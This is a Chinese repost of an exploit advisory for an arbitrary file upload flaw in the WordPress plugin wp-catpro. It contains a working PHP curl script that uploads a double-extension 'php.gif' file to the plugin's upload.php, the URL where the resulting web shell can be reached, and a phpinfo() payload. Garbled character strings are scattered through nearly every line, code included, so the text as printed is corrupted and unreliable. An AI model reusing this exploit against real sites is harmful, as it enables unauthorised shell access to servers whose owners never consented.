WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
0 V  u6 O0 I9 q1 {4 R- u7 ]4 J
( |4 {  W& T4 a2 e( X! Z作者  => Zikou-16
) F! U) l- _7 C1 w7 t8 v邮箱 => zikou16x@gmail.com
6 G7 |. |. V8 c- V9 l测试系统 : Windows 7 , Backtrack 5r3
. l6 s+ u/ @8 {9 Y" t下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
1 H) y4 t" N9 m4 Q# S6 T7 ~0 E4 L' V
#=> Exploit 信息:
------------------
! f# G% Q, N1 A7 Z# 攻击者可以上传 file/shell.php.gif
: Q; b& J* X4 w* ?5 r# ("jpg", "gif", "png")  // Allowed file extensions
( Q9 J0 c) y9 r( R" h# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
9 P' Q5 U3 ~) P, u8 _# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

+ X: n* B% R1 L#=> Exploit
-----------
! M/ d9 ^0 H) S% Q, H8 G$ R<?php
5 V9 U( w4 V( R& x4 T
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
8 b. `4 a, d8 X2 O, `9 j' W5 Ocurl_setopt($ch, CURLOPT_POSTFIELDS,
1 f7 n8 Y7 [) H/ d) uarray('Filedata'=>"@$uploadfile",
/ M8 S8 t1 J; m5 F$ b% j! o9 x( Z/ h'folder'=>'/wp-content/uploads/catpro/'));
" Y0 c  f+ R" k" L/ wcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
6 a' y+ J8 q5 c( u9 E4 C/ X
5 V' I) z. M1 O# W1 G$ m( |, \; aprint "$postResult";
' w- P  p7 w; j2 x# [
$ F( J% [2 B! u( p, f( t0 cShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
: M: g, K6 n) S: K' T<?php
phpinfo();
?>